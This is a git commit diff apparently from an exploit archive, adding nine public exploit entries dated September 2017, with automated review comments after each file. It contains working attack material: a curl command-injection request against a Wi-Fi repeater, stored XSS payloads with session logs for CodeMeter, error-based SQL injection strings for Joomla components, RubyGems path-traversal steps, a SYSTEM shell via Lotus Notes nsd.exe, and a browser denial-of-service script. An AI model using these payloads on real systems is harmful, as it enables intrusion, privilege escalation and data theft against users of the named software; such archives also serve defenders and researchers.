DB: 2017-09-05
9 new exploits IBM Notes 8.5.x/9.0.x - Denial of Service (2) Lotus Notes Diagnostic Tool 8.5/9.0 - Privilege Escalation RubyGems < 2.6.13 - Arbitrary File Overwrite Dup Scout Enterprise 9.9.14 - 'Input Directory' Local Buffer Overflow Joomla! Component Survey Force Deluxe 3.2.4 - 'invite' Parameter SQL Injection Joomla! Component CheckList 1.1.0 - SQL Injection Wireless Repeater BE126 - Remote Code Execution CodeMeter 6.50 - Cross-Site Scripting Symantec Messaging Gateway < 10.6.3-267 - Cross-Site Request Forgery
This commit is contained in:
parent
8f3c450a42
commit
427165968d
10 changed files with 634 additions and 0 deletions
@ -2011,6 +2011,7 @@ id,file,description,date,author,platform,type,port
|
|||
17712,platforms/windows/dos/17712.txt,"Adobe Photoshop CS5 - '.gif' Remote Code Execution",2011-08-22,"Francis Provencher",windows,dos,0
|
||||
17718,platforms/windows/dos/17718.pl,"Groovy Media Player 2.6.0 - '.m3u' Local Buffer Overflow (PoC)",2011-08-26,"D3r K0n!G",windows,dos,0
|
||||
17742,platforms/windows/dos/17742.py,"Mini FTP Server 1.1 - Buffer Corruption Remote Denial of Service",2011-08-28,LiquidWorm,windows,dos,0
|
||||
42604,platforms/multiple/dos/42604.html,"IBM Notes 8.5.x/9.0.x - Denial of Service (2)",2017-08-31,"Dhiraj Mishra",multiple,dos,0
|
||||
17769,platforms/linux/dos/17769.c,"Linux Kernel 3.0.0 - 'perf_count_sw_cpu_clock' event Denial of Service",2011-09-01,"Vince Weaver",linux,dos,0
|
||||
17772,platforms/windows/dos/17772.txt,"BroadWin Webaccess Client - Multiple Vulnerabilities",2011-09-02,"Luigi Auriemma",windows,dos,0
|
||||
17781,platforms/windows/dos/17781.pl,"World Of Warcraft - 'chat-cache.txt' Local Stack Overflow Denial of Service",2011-09-05,"BSOD Digital",windows,dos,0
|
||||
|
@ -9224,6 +9225,9 @@ id,file,description,date,author,platform,type,port
|
|||
42568,platforms/windows/local/42568.py,"Easy RM RMVB to DVD Burner 1.8.11 - Buffer Overflow (SEH)",2017-08-28,"Touhid M.Shaikh",windows,local,0
|
||||
42586,platforms/windows/local/42586.py,"Easy Vedio to PSP Converter 1.6.20 - Buffer Overflow (SEH)",2017-08-28,"Kishan Sharma",windows,local,0
|
||||
42601,platforms/android/local/42601.txt,"Motorola Bootloader - Kernel Cmdline Injection Secure Boot and Device Locking Bypass",2017-09-01,"Roee Hay",android,local,0
|
||||
42605,platforms/windows/local/42605.txt,"Lotus Notes Diagnostic Tool 8.5/9.0 - Privilege Escalation",2017-09-02,ParagonSec,windows,local,0
|
||||
42611,platforms/linux/local/42611.txt,"RubyGems < 2.6.13 - Arbitrary File Overwrite",2017-09-04,mame,linux,local,0
|
||||
42612,platforms/windows/local/42612.py,"Dup Scout Enterprise 9.9.14 - 'Input Directory' Local Buffer Overflow",2017-09-04,"Touhid M.Shaikh",windows,local,0
|
||||
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
||||
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
||||
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||
|
@ -38386,3 +38390,8 @@ id,file,description,date,author,platform,type,port
|
|||
42597,platforms/php/webapps/42597.txt,"Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.6 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0
|
||||
42598,platforms/php/webapps/42598.txt,"Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.7 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0
|
||||
42603,platforms/php/webapps/42603.txt,"FineCMS 1.0 - Multiple Vulnerabilities",2017-08-29,sohaip-hackerDZ,php,webapps,0
|
||||
42606,platforms/php/webapps/42606.txt,"Joomla! Component Survey Force Deluxe 3.2.4 - 'invite' Parameter SQL Injection",2017-09-03,"Ihsan Sencan",php,webapps,0
|
||||
42607,platforms/php/webapps/42607.txt,"Joomla! Component CheckList 1.1.0 - SQL Injection",2017-09-03,"Ihsan Sencan",php,webapps,0
|
||||
42608,platforms/hardware/webapps/42608.txt,"Wireless Repeater BE126 - Remote Code Execution",2017-09-04,"Hay Mizrachi",hardware,webapps,0
|
||||
42610,platforms/multiple/webapps/42610.txt,"CodeMeter 6.50 - Cross-Site Scripting",2017-09-04,Vulnerability-Lab,multiple,webapps,0
|
||||
42613,platforms/multiple/webapps/42613.txt,"Symantec Messaging Gateway < 10.6.3-267 - Cross-Site Request Forgery",2017-08-09,"Dhiraj Mishra",multiple,webapps,0
|
||||
|
|
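--- a/platforms/hardware/webapps/42608.txt
+++ b/platforms/hardware/webapps/42608.txt
@@ -0,0 +1,33 @@
+# Exploit Title: WIFI Repeater BE126 – Remote Code Execution
+# Date Publish: 09/09/2017
+# Exploit Authors: Hay Mizrachi, Omer Kaspi
+
+# Contact: haymizrachi@gmail.com, komerk0@gmail.com
+# Vendor Homepage: http://www.twsz.com
+# Category: Webapps
+# Version: 1.0
+# Tested on: Windows/Ubuntu 16.04
+
+# CVE: CVE-2017-13713
+
+1 - Description:
+
+HTTP POST request that contains user parmater which can give us to run
+Remote Code Execution to the device.
+The parameter is not sanitized at all, which cause him to be vulnerable.
+
+
+2 - Proof of Concept:
+
+curl -d "name=HTTP&url="http://www.test.com&user=;echo hacked!! >
+/var/mycode;&password=a&port=8&dir=a"
+--cookie "Cookie: sessionsid=XXXXX; auth=ok expires=Sun, 15-May-2112
+01:45:46 GMT; langmanulset=yes;
+sys_UserName=admin; expires=Mon, 31-Jan-2112 16:00:00 GMT; language=en_us"
+-X POST http://beconnected.client/cgi-bin/webupg
+
+3 - Timeline:
+
+29/4/2017 – Vulnerability Discovered.
+29/4/2017 - Vendor not responding.
+03/09/2017 – Exploit published.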
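Review bot: The publication date is recorded three different ways: `# Date Publish: 09/09/2017` in the header, `03/09/2017 – Exploit published.` in the timeline, and 2017-09-04 in the files.csv row for 42608, so at least one of them is wrong and the header and timeline should be made to agree. The header also records no vendor fix or workaround although the timeline shows the vendor never responded; a line such as `# Fix: none available at publication (vendor did not respond)` would tell readers the device is unpatched. `# Tested on: Windows/Ubuntu 16.04` appears to describe the machine the request was sent from rather than the affected firmware, which is only identified as `# Version: 1.0`; stating which of the two it means would avoid confusion.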
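--- a/platforms/linux/local/42611.txt
+++ b/platforms/linux/local/42611.txt
@@ -0,0 +1,30 @@
+There is no check for name field in metadata.gz. By assigning a maliciously crafted string like ../../../../../any/where to the field, an attacker can create an arbitrary file out of the directory of the gem, or even replace an existing file with a malicious file.
+
+Proof of Concept 1: Create a file anywhere
+
+This PoC attempts to create a file /tmp/malicious-0/BOOOOM.
+
+1) Download the attached file malicious.gem.
+2) Run gem install malicious.gem --no-doc.
+3) /tmp/malicious-0/BOOOOM should be created.
+
+malicious.gem assigns ../../../../../../../../../../tmp/malicious as name field. This attack is relatively weak since the path must include a directory named <name>-<version>, such as malicious-0. Still, there are many chances that cause a catastrophe. For example, think of replacing a file in /etc/dbus-1/.
+
+Proof of Concept 2: Replace rackup command
+
+This PoC attempts to replace gems/rack-2.0.3/bin/rackup with a malicious file.
+
+1) Download the attached file replace-rackup.gem.
+2) Run gem install rack -v 2.0.3.
+3) Run gem install replace-rackup.gem --no-doc.
+4) Run rackup. It will emit just BOOOOM!.
+
+replace-rackup.gem assigns ../gems/rack as name field, and contains a malicious file bin/rackup. This is really exploitable for attackers.
+
+Note
+
+For how to create the malicious gems, see the attached file src.tar.gz.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42611.zip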
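Review bot: This entry has no header block: unlike the other files in this commit it states no title, date, author, CVE or fixed version, and the `< 2.6.13` in its files.csv description is the only place the fixed release is recorded. A header in the commit's usual form (`# Exploit Title: RubyGems < 2.6.13 - Arbitrary File Overwrite`, `# Exploit Author: mame`, `# Version: RubyGems < 2.6.13`) would make the file self-describing. The text refers to attached files malicious.gem, replace-rackup.gem and src.tar.gz while the only link given is 42611.zip; presumably the zip contains them, but the note should say so rather than leave the reader to guess.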
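--- a/platforms/multiple/dos/42604.html
+++ b/platforms/multiple/dos/42604.html
@@ -0,0 +1,42 @@
+# Exploit Title: IBM Notes is affected by a denial of service vulnerability
+# Date: 31 August 2017
+# Software Link: http://www-01.ibm.com/support/docview.wss?uid=swg21999384
+# Exploit Author: Dhiraj Mishra
+# Contact: http://twitter.com/mishradhiraj_
+# Website: http://datarift.blogspot.in/
+# CVE: CVE-2017-1130
+# Category: IBM Notes (Console Application)
+
+
+1. Description
+
+IBM Notes is vulnerable to a denial of service involving persuading a user to click on a malicious link, which would ultimately cause the client to have to be restarted.
+
+2. Proof of concept
+
+<script>
+var w;
+var wins = {};
+var i = 1;
+f.click();
+setInterval("f.click()", 1);
+setInterval(function(){
+for (var k in wins) {
+// after creating window .status = '' (empty string), when the file dialog is displayed its value changes to 'undefined'.
+if (wins[k] && wins[k].status === undefined) {
+wins[k].close();
+delete wins[k];
+}
+}
+w = open('data:text/html,<input type=file id=f><script>f.click();setInterval("f.click()", 1);<\/script>');
+if (w) {
+wins[i] = w;
+i++;
+}
+}, 1);
+</script>
+
+
+3. IBM Security Bulletin
+
+http://www-01.ibm.com/support/docview.wss?uid=swg21999384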
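Review bot: The script's first statement is `f.click();`, but no element named `f` is declared in this file; the only `<input type=file id=f>` is inside the data: URL string passed to `open(...)` further down, so as pasted the top-level script would stop on a reference error before either `setInterval` is registered. Whatever host page the snippet is meant to live in should be documented, for example with a leading comment `// expects the embedding page to define a file input with id f` so that readers evaluating the report can tell the dependency from a typo. The file is saved as .html yet consists of advisory text around a bare `<script>` block with no surrounding document, which is a style inconsistency with the other entries in this commit that use .txt for the same layout.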
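--- a/platforms/multiple/webapps/42610.txt
+++ b/platforms/multiple/webapps/42610.txt
@@ -0,0 +1,316 @@
+Document Title:
+===============
+Wibu Systems AG CodeMeter 6.50 - Persistent XSS Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2074
+
+ID: FB49498
+
+Acknowledgements: https://www.flickr.com/photos/vulnerabilitylab/36912680045/
+
+http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13754
+
+CVE-ID:
+=======
+CVE-2017-13754
+
+
+Release Date:
+=============
+2017-09-04
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2074
+
+
+Common Vulnerability Scoring System:
+====================================
+3.5
+
+
+Vulnerability Class:
+====================
+Cross Site Scripting - Persistent
+
+
+Current Estimated Price:
+========================
+500€ - 1.000€
+
+
+Product & Service Introduction:
+===============================
+CodeMeter is the universal technology for software publishers and intelligent device manufacturers, upon which all
+solutions from Wibu-Systems are built. You want to protect the software you have developed against piracy and
+reverse engineering. CodeMeter requires your attention only once: its integration in your software and your business
+workflow is necessary at one point in time only. Protection Suite is the tool that automatically encrypts your
+applications and libraries. In addition, CodeMeter offers an API for custom integration with your software.
+
+(Copy of the Homepage: http://www.wibu.com/us/codemeter.html )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a persistent input validation vulnerability in the official
+Wibu Systems CodeMeter WebAdmin v6.50 application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2017-05-20: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
+2017-05-21: Vendor Notification (Wibu Systems AG - Security Department)
+2017-05-22: Vendor Response/Feedback (Wibu Systems AG - Security Department)
+2017-08-01: Vendor Fix/Patch (Wibu Systems AG - Service Developer Team)
+2017-08-20: Security Acknowledgements (Wibu Systems AG - Security Department)
+2017-09-04: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Wibu-Systems AG
+Product: CodeMeter & Control Panel - WebAdmin (Web-Application) 6.50.2624.500
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Technical Details & Description:
+================================
+A persistent input validation vulnerability has been discovered in the Wibu Systems AG CodeMeter WebAdmin v6.50 web-server web-application.
+The vulnerability allows remote attackers to inject own malicious script code with application-side vector to the vulnerable function or
+module to followup with a compromising attack.
+
+The input validation vulnerability has been discovered in the `server name` input field of the `advanced settings - time server` module.
+The request method to inject is POST and the attack vector is located on the application-side. First the attacker injects the payload and
+after it the POST request is performed to save the content permanently. After that the issue triggers on each visit an execution. The basic
+validation in the application is well setup but in case of the advanced settings the validation parameter are still not implemented to secure
+the function at all. The vulnerability is a classic filter input validation vulnerability. The application has no cookies and therefore the
+attack risk is more minor but not that less then to ignore it. The vulnerable files are `ChangeConfiguration.html`, `time_server_list.html`
+and `certified_time.html`. The `ChangeConfiguration.html` is marked as injection point for the payload. The `time_server_list.html` and
+`certified_time.html` files are mared with the execution point of the issue.
+
+The security issue was uncovered during the blurrybox hacking contest of the wibu systems ag and acknowledged by the management.
+
+The security risk of the persistent input validation issue is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5.
+Exploitation of the persistent input validation web vulnerability requires low user interaction and a privileged web-application user account.
+Successful exploitation of the vulnerability results in persistent phishing attacks, persistent external redirects to malicious sources and
+persistent manipulation of affected or connected application modules.
+
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] Advanced Settings - Time Server
+
+Vulnerable File(s):
+[+] ChangeConfiguration.html
+
+Vulnerable Parameter(s):
+[+] server name
+
+Affected Module(s):
+[+] time_server_list.html
+[+] certified_time.html
+
+
+Proof of Concept (PoC):
+=======================
+The persistent input validation vulnerability can be exploited by remote attackers with privileged user account and with low user interaction.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+
+Manual steps to reproduce the vulnerability ...
+1. Start the CodeMeter software
+2. Open the webadmin gui
+3. Move to advanced settings
+4. Open the time-server module
+5. Click the plus to add a new time server
+Note: The request method is POST
+6. Inject a test script code payload with matching domain and save via POST
+7. The code is saved and executes of the dbms in the time-server list module index
+8. Successful reproduce of the vulnerability!
+
+Note: The method can be automated by usage of post method requester to include a payload.
+
+
+PoC: Payload (Exploitation)
+cmtime.codehacker.de/>"<img src="evil.source" onload=alert("GUTENMORGEN")>
+cmtime.codehacker.de/>"<iframe src="evil.source" onload=alert("GUTENMORGEN")>
+
+
+
+PoC: Vulnerable Source
+<div id="time_server_to_add"><input id="TimeServerId1" name="time_server_list_list" value="cmtime.codemeter.com"
+type="radio"><label class="time_server_list_list_label" for="TimeServerId1"><span class="ct100_t bld ssl_number_space">1.
+</span>cmtime.codemeter.com<span class="ssl_up" onclick="onClickSSLUp(this);" style="visibility: hidden;"><span class="fa
+fa-arrow-up fa-list-buttons"></span></span><span class="ssl_down" onclick="onClickSSLDown(this);"><span class="fa fa-arrow-down
+fa-list-buttons"></span></span><span class="ssl_delete" onclick="onClickDelete(this);"><span class="fa fa-trash-o fa-list-buttons">
+</span></span></label><input id="TimeServerId3" name="time_server_list_list" value="cmtime.codemeter.de" type="radio">
+<label class="time_server_list_list_label" for="TimeServerId3"><span class="ct100_t bld ssl_number_space">2. </span>cmtime.codemeter.de
+<span class="ssl_up" onclick="onClickSSLUp(this);"><span class="fa fa-arrow-up fa-list-buttons"></span></span><span class="ssl_down"
+onclick="onClickSSLDown(this);"><span class="fa fa-arrow-down fa-list-buttons"></span></span><span class="ssl_delete"
+onclick="onClickDelete(this);"><span class="fa fa-trash-o fa-list-buttons"></span></span></label><input id="TimeServerId4"
+name="time_server_list_list" value="cmtime.codemeter.us" type="radio"><label class="time_server_list_list_label" for="TimeServerId4">
+<span class="ct100_t bld ssl_number_space">3. </span>cmtime.codemeter.us<span class="ssl_up" onclick="onClickSSLUp(this);">
+<span class="fa fa-arrow-up fa-list-buttons"></span></span><span class="ssl_down" onclick="onClickSSLDown(this);" style="visibility:
+visible;"><span class="fa fa-arrow-down fa-list-buttons"></span></span><span class="ssl_delete" onclick="onClickDelete(this);">
+<span class="fa fa-trash-o fa-list-buttons"></span></span></label><input id="cmtime.codehacker.de/>" <img="" src="evil.source">"
+type="radio" name="time_server_list_list" value="cmtime.codehacker.de/>"<img src="evil.source">"/><label class="time_server_list_list_label"
+for="cmtime.codehacker.de/>" <img="" src="evil.source">"><span id="ssl_number_cmtime.codehacker.de/>" <img="" src="evil.source">"[EXECUTABLE PAYLOAD!]
+class="ct100_t bld ssl_number_space"></span>cmtime.codehacker.de/>"<img src="evil.source"><span class="ssl_up"
+onclick="onClickSSLUp(this);"><span class="fa fa-arrow-up fa-list-buttons"></span></span><span class="ssl_down"
+onclick="onClickSSLDown(this);" style="visibility: hidden;"><span class="fa fa-arrow-down fa-list-buttons"></span></span>
+<span class="ssl_delete" onclick="onClickDelete(this);"><span class="fa fa-trash-o fa-list-buttons"></span></span></label></div>
+
+
+--- PoC Session Logs (GET) ---
+Status: 200[OK]
+POST http://localhost:22350/actions/ChangeConfiguration.html
+Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[1544]
+Mime Type[text/html]
+Request Header:
+Host[localhost:22350]
+User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0]
+Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+Content-Type[application/x-www-form-urlencoded]
+Content-Length[255]
+Referer[http://localhost:22350/configuration/certified_time.html]
+Cookie[com.wibu.cm.webadmin.lang=de-DE]
+Connection[keep-alive]
+Upgrade-Insecure-Requests[1]
+POST-Daten:
+Action[CertifiedTimeConfiguration]
+TimeServerList[cmtime.codemeter.com%7Ccmtime.codemeter.de%7Ccmtime.codemeter.us%7Ccmtime.codehacker.de/>"<img src="evil.source" onload=alert("GUTENMORGEN")>%7C]
+SoapTimeOut[20]
+certified_time_time_out[20]
+ApplyButton[Apply]
+WaFormGuard[v0V839tW3xkpa6jC26kYsvZJxe0UFJCl4%2FB2ipA6Xpwv]
+Response Header:
+Server[WIBU-SYSTEMS HTTP Server]
+Date[21 May 2017 16:00:21 +0000]
+Content-Type[text/html; charset=utf-8]
+X-Frame-Options[SAMEORIGIN]
+x-xss-protection[1; mode=block]
+Accept-Ranges[bytes]
+Content-Length[1544]
+-
+Status: 200[OK]
+GET http://localhost:22350/configuration/iframe/evil.source[PAYLOAD EXECUTION]
+Load Flags[LOAD_NORMAL] Größe des Inhalts[2320] Mime Type[text/html]
+Request Header:
+Host[localhost:22350]
+User-Agent[zero-zero]
+Accept[*/*]
+Referer[http://localhost:22350/configuration/iframe/time_server_list.html]
+Cookie[com.wibu.cm.webadmin.lang=de-DE]
+Connection[keep-alive]
+Response Header:
+Server[WIBU-SYSTEMS HTTP Server]
+Date[19 May 2017 21:02:23 +0000]
+Connection[close]
+Content-Type[text/html; charset=utf-8]
+X-Frame-Options[SAMEORIGIN]
+x-xss-protection[1; mode=block]
+Accept-Ranges[bytes]
+Content-Length[2320]
+-
+Status: 200[OK]
+GET http://localhost:22350/configuration/iframe/evil.source
+Mime Type[text/html]
+Request Header:
+Host[localhost:22350]
+User-Agent[zero-zero]
+Accept[*/*]
+Referer[http://localhost:22350/configuration/iframe/time_server_list.html]
+Cookie[com.wibu.cm.webadmin.lang=de-DE]
+Connection[keep-alive]
+Response Header:
+Server[WIBU-SYSTEMS HTTP Server]
+Date[19 May 2017 21:06:56 +0000]
+Connection[close]
+Content-Type[text/html; charset=utf-8]
+X-Frame-Options[SAMEORIGIN]
+x-xss-protection[1; mode=block]
+X-Content-Type-Options[nosniff]
+Accept-Ranges[bytes]
+Content-Length[2320]
+
+
+Reference(s):
+http://localhost:22350/
+http://localhost:22350/configuration/
+http://localhost:22350/configuration/ChangeConfiguration.html
+http://localhost:22350/configuration/certified_time.html
+http://localhost:22350/configuration/time_server_list.html
+
+
+Solution - Fix & Patch:
+=======================
+1. Restrict the input field and disallow the usage of special chars like in the other input fields
+2. Parse the input field and escape the content
+3. Parse in the visible listing the output location of the item
+4. Setup a secure exception-handling to handl illegal events
+5. Include a proper validation mask to the form to prevent further injection attacks
+
+The security vulnerability has been patched in the version 6.50b.
+
+
+Security Risk:
+==============
+The seurity risk of the persistent input validation web vulnerability in the web-server webadmin web-application is estimated as medium (CVSS 3.5).
+Earlier version releases up to codemeter 6.50 may be affected as well by the cross site scripting web vulnerability.
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or
+implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any
+case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its
+suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
+or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface
+websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories
+or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails,
+phone numbers, conversations or anything else to journalists, investigative authorities or private individuals.
+
+Domains: www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com
+Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
+Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
+Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
+
+Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
+Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
+of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission.
+
+Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+
+
+--
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
+
+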
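Review bot: Item 1 of `Solution - Fix & Patch` leads with restricting special characters in the `server name` input, but the advisory's own technical section places the execution point in `time_server_list.html` and `certified_time.html`, and the vulnerable source shows the stored value landing inside `value=`, `id=` and `for=` attributes; the durable fix is therefore contextual output encoding (HTML attribute encoding at those render points) rather than an input blacklist, and item 1 should say so. The session logs show `x-xss-protection[1; mode=block]` on every response; since that header targets reflected payloads and evidently did not stop this stored one, a sentence stating that it is not a mitigation here would pre-empt the obvious reader question. The `Security Risk` section's claim that earlier releases up to 6.50 "may be affected" is unverified against the single build tested (6.50.2624.500) and should be marked as untested rather than left as an affected-version statement.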
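--- a/platforms/multiple/webapps/42613.txt
+++ b/platforms/multiple/webapps/42613.txt
@@ -0,0 +1,27 @@
+# Exploit Title: CSRF
+# Date: August 9, 2017
+# Software Link: https://www.symantec.com/products/messaging-gateway
+# Exploit Author: Dhiraj Mishra
+# Contact: http://twitter.com/mishradhiraj_
+# Website: http://datarift.blogspot.in/
+# CVE: CVE-2017-6328
+# Category: Symantec Messaging Gateway
+
+1. Description
+
+The Symantec Messaging Gateway can encounter an issue of cross site request forgery (also known as one-click attack and is abbreviated as CSRF or XSRF), which is a type of malicious exploit of a website where unauthorized commands are transmitted from a user that the web application trusts. A CSRF attack attempts to exploit the trust that a specific website has in a user's browser.
+
+2. Proof of concept
+
+The SMG did not protect the logout form with csrf token, therefore i can logout any user by sending this url https://YourIPHere/brightmail/logout.do
+Here's an attack vector:
+
+1) Set up a honeypot that detects SMG scans/attacks (somehow).
+2) Once I get a probe, fire back a logout request.
+3) Continue to logout the active user forever.
+
+It's less damaging than a traditional "hack back" but is sure to irritate the local red team to no end. It's essentially a user DoS.
+
+3. Symantec Security Bulletin
+
+https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20170810_00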
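Review bot: `# Exploit Title: CSRF` names neither the product nor the affected version, and the `< 10.6.3-267` fixed release that the files.csv description carries appears nowhere in the file; the title should match the csv, `# Exploit Title: Symantec Messaging Gateway < 10.6.3-267 - Cross-Site Request Forgery`, and a `# Version:` line should record the affected range. The description paragraph defines CSRF in general terms while the concrete finding is a logout URL (`/brightmail/logout.do`) reachable without an anti-CSRF token, with impact limited to forcing a logout; stating that in one line in the description would let readers triage the entry without reading to the end. The numbered "attack vector" list is speculative by its own wording ("somehow") and reads as commentary rather than reproduction steps, so labelling it as such would keep it from being mistaken for the PoC.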
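--- a/platforms/php/webapps/42606.txt
+++ b/platforms/php/webapps/42606.txt
@@ -0,0 +1,25 @@
+# # # # #
+# Exploit Title: Joomla! Component Survey Force Deluxe 3.2.4 - SQL Injection
+# Dork: N/A
+# Date: 03.09.2017
+# Vendor Homepage: http://joomplace.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/surveys/survey-force-deluxe/
+# Demo: http://demo30.joomplace.com/our-products/survey-force-deluxe
+# Version: 3.2.4
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/index.php?option=com_surveyforce&task=start_invited&survey=19&invite=[SQL]
+#
+# Etc..
+# # # # #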
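Review bot: `# Exploit Title` omits the `'invite' Parameter` qualifier that the files.csv description carries, and the description line `# The vulnerability allows an attacker to inject sql commands....` is boilerplate that names neither the parameter nor the task; it should state that the `invite` parameter of `task=start_invited` is injectable, which is what the PoC URL shows. No fixed version or vendor-notification status is recorded, so a reader cannot tell whether 3.2.4 is the last affected release; a `# Fixed in:` line, even if its value is `unknown`, would make that explicit. The same two points apply to 42607.txt (Joomla! Component CheckList 1.1.0) in this commit, which shares the same header template and description text.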
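--- a/platforms/php/webapps/42607.txt
+++ b/platforms/php/webapps/42607.txt
@@ -0,0 +1,29 @@
+# # # # #
+# Exploit Title: Joomla! Component CheckList 1.1.0 - SQL Injection
+# Dork: N/A
+# Date: 03.09.2017
+# Vendor Homepage: http://joomplace.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/living/personal-life/checklist/
+# Demo: http://checklistdemo.joomplace.com/
+# Version: 1.1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/[PROFILE][SQL].html
+# http://localhost/[PATH]/[TAG][SQL].html
+# http://localhost/[PATH]/[CHECKLIST][SQL].html
+#
+# our-products/checklist/checklist/tag/social'and+(SeLeCT+1+FrOM+(SeLeCT+count(*),COncaT((SeLeCT(SeLeCT+COncaT(cast(database()+as+char),0x7e))+FrOM+information_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2))x+FrOM+information_schema.tables+group+by+x)a)+AND+''='.html
+#
+# Etc..
+# # # # #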
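Review bot: The PoC lists three route templates (`[PROFILE]`, `[TAG]`, `[CHECKLIST]`) but the single worked example only exercises the tag route, so the other two are asserted without evidence; either an example per route or a note that only the tag route was verified should be added. The worked example is also given as a site-relative path without the `[PATH]` prefix that the templates use, which makes it unclear how it maps onto the `http://localhost/[PATH]/...` form above it. The missing fixed-version and vendor-notification lines are noted on 42606.txt in this commit and apply here as well.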
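--- a/platforms/windows/local/42605.txt
+++ b/platforms/windows/local/42605.txt
@@ -0,0 +1,36 @@
+# Exploit Title: Lotus Notes Diagnostic Tool (nsd.exe) Privelege Escalation
+# Date: 02-09-2017
+# Exploit Author: ParagonSec
+# Website: https://github.com/paragonsec
+# Version: 8.5 & 9.0
+# Tested on: Windows 7 Enterprise
+# CVE: CVE-2015-0179
+# Vendor CVE URL: http://www-01.ibm.com/support/docview.wss?uid=swg21700029
+# Category: Local & Privilege Escalation Exploit
+
+
+1. Description
+
+Lotus Notes Diagnostic Tool (nsd.exe) runs under NT Authority/System rights.
+This can be leveraged to run a program under the System context and elevate
+local privileges.
+
+
+2. Proof of Concept
+
+First you need to execute nsd.exe under the monitor/CLI mode:
+
+> nsd.exe -monitor
+
+Next, after NSD finishes loading you can execute any program under the System context. In this example we will execute CMD.
+
+nsd> LOAD CMD
+
+You will see that cmd is opened as System now.
+
+Also, NSD can be used to attach, kill processes or create memory dumps under the System context.
+
+
+3. Solution:
+
+This has been fixed on release 9.0.1 FP3 and 8.5.3 FP6.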
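Review bot: `# Version: 8.5 & 9.0` is broader than the Solution section, which says the issue was fixed in 9.0.1 FP3 and 8.5.3 FP6; the header should carry the bounded range, `# Version: 8.5.x before 8.5.3 FP6, 9.0.x before 9.0.1 FP3`, so the affected builds are visible without reading to the end. The title misspells "Privelege" (the files.csv row spells it correctly), and since the CVE recorded is CVE-2015-0179 with a vendor URL to the 2015 bulletin, the 2017 date on this entry suggests it documents an already-fixed issue; a sentence saying the PoC applies only to pre-fix builds would stop readers treating it as a new finding. The one-line root cause, that a diagnostic tool running as SYSTEM exposes a command that launches arbitrary programs, is stated only implicitly across the description and PoC and could be named in the description.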
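--- a/platforms/windows/local/42612.py
+++ b/platforms/windows/local/42612.py
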